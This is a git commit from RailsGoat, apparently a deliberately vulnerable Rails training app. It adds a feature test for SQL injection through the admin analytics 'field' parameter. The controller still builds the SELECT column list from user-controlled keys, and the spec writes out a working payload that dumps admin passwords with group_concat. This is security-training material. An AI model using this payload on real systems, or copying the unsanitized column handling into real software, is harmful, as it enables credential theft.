Merge branch 'add-test-case-for-a1-field-injection' of https://github.com/jmmastey/railsgoat into jmmastey-add-test-case-for-a1-field-injection
This commit is contained in:
cktricky
@@ -9,7 +9,7 @@ class AdminController < ApplicationController
|
||||
if params[:field].nil?
|
||||
fields = "*"
|
||||
else
|
||||
fields = params[:field].map {|k,v| k }.join(",")
|
||||
fields = custom_fields.join(",")
|
||||
end
|
||||
|
||||
if params[:ip]
|
||||
@@ -60,6 +60,11 @@ class AdminController < ApplicationController
|
||||
|
||||
private
|
||||
|
||||
def custom_fields
|
||||
params.require(:field).keys
|
||||
end
|
||||
helper_method :custom_fields
|
||||
|
||||
def admin_param
|
||||
params[:admin_id] != '1'
|
||||
end
|
||||
|
||||
@@ -1,18 +1,18 @@
|
||||
<form action="">
|
||||
Search by IP: <input type="text" name="ip"><br />
|
||||
<input type="checkbox" value="" name="field[ip_address]"> IP Address<br />
|
||||
<input type="checkbox" value="" name="field[referrer]"> Referrer<br />
|
||||
<input type="checkbox" value="" name="field[user_agent]"> User Agent
|
||||
<form action="" id="analytics_search">
|
||||
Search by IP: <input type="text" id="ip" name="ip"><br />
|
||||
<input type="checkbox" value="" id="field_ip_address" name="field[ip_address]"> IP Address<br />
|
||||
<input type="checkbox" value="" id="field_referrer" name="field[referrer]"> Referrer<br />
|
||||
<input type="checkbox" value="" id="field_user_agent" name="field[user_agent]"> User Agent
|
||||
</form>
|
||||
|
||||
<div id="dt_example" class="example_alt_pagination">
|
||||
<table class="table table-striped table-hover table-bordered pull-left" id="data-table">
|
||||
<table class="table table-striped table-hover table-bordered pull-left <%= "custom" if params[:field] %>" id="data-table">
|
||||
<thead>
|
||||
<tr>
|
||||
<%
|
||||
count = (params[:field] ? params[:field].count : 3)
|
||||
count = (params[:field] ? (custom_fields.count+1) : 6)
|
||||
count.times do %>
|
||||
<td> </td>
|
||||
<th> </th>
|
||||
<% end %>
|
||||
</tr>
|
||||
</thead>
|
||||
@@ -33,6 +33,8 @@
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<%= javascript_include_tag "jquery.dataTables.js"%>
|
||||
|
||||
<script type="text/javascript">
|
||||
|
||||
function dataTablePagination(){
|
||||
@@ -42,4 +44,4 @@ function dataTablePagination(){
|
||||
};
|
||||
|
||||
$(document).ready(dataTablePagination());
|
||||
</script>
|
||||
</script>
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
require 'spec_helper'
|
||||
|
||||
feature 'sql injection' do
|
||||
before do
|
||||
before(:each) do
|
||||
UserFixture.reset_all_users
|
||||
@normal_user = UserFixture.normal_user
|
||||
@admin_user = User.where("admin='t'").first
|
||||
@@ -28,4 +28,24 @@ feature 'sql injection' do
|
||||
expect(@admin_user.email).to eq('joe.admin@schmoe.com')
|
||||
expect(@admin_user.admin).to eq(true)
|
||||
end
|
||||
|
||||
scenario "attack\nTutorial: https://github.com/OWASP/railsgoat/wiki/A1-SQL-Injection-Interpolation", js: true do
|
||||
login(@normal_user)
|
||||
Analytics.create!(ip_address: "::1")
|
||||
|
||||
visit "/admin/1/analytics"
|
||||
|
||||
within('#analytics_search') do
|
||||
fill_in 'ip', :with => '::1'
|
||||
check "field_user_agent"
|
||||
payload = "(select group_concat(password) from users where admin='t')"
|
||||
|
||||
page.execute_script "$('#field_user_agent').attr('name', \"field[#{payload}]\");"
|
||||
page.execute_script "$('#analytics_search').submit();"
|
||||
end
|
||||
|
||||
pending if verifying_fixed?
|
||||
expect(page).to have_css(".dataTable.custom")
|
||||
expect(page.source).to include(@admin_user.password)
|
||||
end
|
||||
end
|
||||
|
||||
Reference in New Issue
Block a user